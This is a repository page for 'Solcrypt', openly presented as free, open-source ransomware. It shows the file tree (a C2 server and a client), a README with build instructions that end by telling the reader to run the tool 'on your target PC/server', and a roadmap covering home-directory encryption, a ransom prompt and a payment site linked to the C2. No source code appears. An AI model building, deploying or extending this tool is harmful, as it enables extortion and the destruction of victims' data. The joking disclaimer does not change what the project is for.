FOSS Ransomware (please don't use this illegally)
Go to file
2024-07-27 20:37:33 +03:00
server feat: c2 rewrite w/ diesel 2024-07-27 20:26:57 +03:00
src feat: client modifications in accordance with server rewrite 2024-07-27 20:37:33 +03:00
.gitignore feat: c2 rewrite w/ diesel 2024-07-27 20:26:57 +03:00
build.sh feat: client modifications in accordance with server rewrite 2024-07-27 20:37:33 +03:00
Cargo.lock feat: c2 rewrite w/ diesel 2024-07-27 20:26:57 +03:00
Cargo.toml feat: c2 rewrite w/ diesel 2024-07-27 20:26:57 +03:00
LICENSE feat: add license & readme 2024-06-14 17:07:17 +03:00
note.txt revert that, that was meant for a different git repo 2024-07-06 14:18:39 +03:00
README.md feat: expand roadmap 2024-07-04 20:31:51 +03:00

Solcrypt

A "hobby project" ransomware that isn't really meant to be used for illegal purposes. I made this for fun, ok? Don't get me in legal trouble for it

Setup

Arch

sudo pacman -S rustup
rustup default stable
rustup target add x86_64-pc-windows-gnu # if compiling for windows targets
git clone https://git.xorycode.dev/xory/solcrypt
cd solcrypt 
bash build.sh # this builds both encryptor and decryptor

Then run it on your target PC/server

Roadmap

  • Basic home directory encryption
  • Randomly generated encryption key
  • Ransom prompt?
  • Server
  • Payment website
  • Payment website communicating with C2
  • Meow?